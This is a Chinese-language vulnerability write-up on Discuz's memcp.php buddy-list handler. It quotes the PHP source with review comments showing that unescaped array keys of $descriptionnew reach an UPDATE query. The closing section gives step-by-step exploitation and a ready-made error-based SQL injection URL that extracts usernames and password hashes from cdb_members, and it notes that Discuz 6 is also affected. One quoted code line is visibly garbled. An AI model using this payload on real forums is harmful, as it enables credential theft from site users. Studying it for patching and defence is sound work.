漏洞文件:memcp.php
// memcp.php, action=buddylist.
// Without a submit: loads the current user's buddy rows (joined with members for the
// username), localises each dateline and renders the memcp_misc template.
// With a submit: applies deletions ($delete), description edits ($descriptionnew) and
// the addition of one new buddy ($newbuddy / $newbuddyid), then redirects with a message.
// Every query below is built by string interpolation; the escaping of each interpolated
// value therefore depends entirely on what happened to it before this branch runs.
elseif($action == 'buddylist') {
    if(!submitcheck('buddysubmit', 1)) {
        $query = $db->query("SELECT b.*, m.username FROM {$tablepre}buddys b, {$tablepre}members m WHERE b.uid='$discuz_uid' AND m.uid=b.buddyid ORDER BY dateline DESC");
        while($buddy = $db->fetch_array($query)) {
            // Shift the stored UTC timestamp by the configured offset (hours) before formatting.
            $buddy['dateline'] = gmdate("$dateformat $timeformat", $buddy['dateline'] + $timeoffset * 3600);
            $buddylist[] = $buddy;
        }
        include template('memcp_misc');
    } else {
        // Existing buddies keyed by buddyid, used to detect unchanged descriptions and duplicates.
        $buddyarray = array();
        $query = $db->query("SELECT * FROM {$tablepre}buddys WHERE uid='$discuz_uid'");
        while($buddy = $db->fetch_array($query)) {
            $buddyarray[$buddy['buddyid']] = $buddy;
        }
        if(!empty($delete) && is_array($delete)) {
            // The *values* of $delete are what get interpolated here; per the registration loop
            // quoted below they pass through daddslashes() — TODO confirm that it recurses into
            // arrays. Casting each element with intval() before the implode would not rely on that.
            // NOTE(review): the implode separator as printed in this listing looks garbled
            // (likely a transcription artifact) — verify against the shipped file.
            $db->query("DELETE FROM {$tablepre}buddys WHERE uid='$discuz_uid' AND buddyid IN ('".implode('/',/'', $delete)."')");
        }
        if(is_array($descriptionnew)) {
            // The problem is here: $descriptionnew is never initialised in this file. Discuz
            // registers request variables at startup, so a request such as
            // http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[123']=1
            // is what creates the $descriptionnew variable.
            /* include/common.inc.php — the registration loop:
            foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
                foreach($$_request as $_key => $_value) {
                    $_key{0} != '_' && $$_key = daddslashes($_value);
                }
            }
            Note that only $_value goes through daddslashes(); array keys are registered as-is. */
            foreach($descriptionnew as $buddyid => $desc) {
                // At this point $buddyid is 123'. The startup registration code does not escape
                // array keys, so only magic_quotes_gpc (if enabled) would affect it.
                // NOTE(review): $buddyid is an attacker-controlled array key interpolated into SQL
                // below without escaping; the minimal fix is to cast it before any use, e.g.
                // $buddyid = intval($buddyid); (buddyid is a numeric uid), or to skip non-numeric keys.
                if(($desc = cutstr(dhtmlspecialchars($desc), 255)) != addslashes($buddyarray[$buddyid]['description'])) {
                    $db->query("UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='$buddyid'");
                    // $buddyid is carried straight into the UPDATE statement, i.e. effectively:
                    // UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='123''
                }
            }
        }
        if(($newbuddy && $newbuddy != $discuz_userss) || ($newbuddyid && $newbuddyid != $discuz_uid)) {
            // Non-admin groups (adminid 1..3 are exempt) are capped at 20 buddies.
            if(!in_array($adminid, array(1, 2, 3))) {
                $query = $db->query("SELECT COUNT(*) FROM {$tablepre}buddys WHERE uid='$discuz_uid'");
                if(($db->result($query, 0)) > 20) {
                    showmessage('buddy_add_toomany');
                }
            }
            // Resolve the new buddy by uid when given, otherwise by username.
            $query = $db->query("SELECT uid FROM {$tablepre}members WHERE ".(empty($newbuddyid) ? "username='$newbuddy'" : "uid='$newbuddyid'"));
            if($buddyid = $db->result($query, 0)) {
                // Here $buddyid is the uid returned by the database, not request data.
                if(isset($buddyarray[$buddyid])) {
                    showmessage('buddy_add_invalid');
                }
                $db->query("INSERT INTO {$tablepre}buddys (uid, buddyid, dateline, description) VALUES ('$discuz_uid', '$buddyid', '$timestamp', '".cutstr(dhtmlspecialchars($newdescription), 255)."')");
            } else {
                showmessage('buddy_add_nonexistence');
            }
        }
        showmessage('buddy_update_succeed', 'memcp.php?action=buddylist');
    }
分析没有什么技术含量，所以还是给出利用方法吧，方便大家以后遇见时可以不用像我一样下代码回来分析，而是有个可以直接利用的方法和代码。
1.先注册账号然后登陆账号
2.
http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[']=1 post formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4
formhash 看html源代码直接替换下
exp:
http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,password,0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1 post formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4
看了一下，Discuz 6 也是存在的，不过移到了这个地方：
http://L/my.php?item=buddylist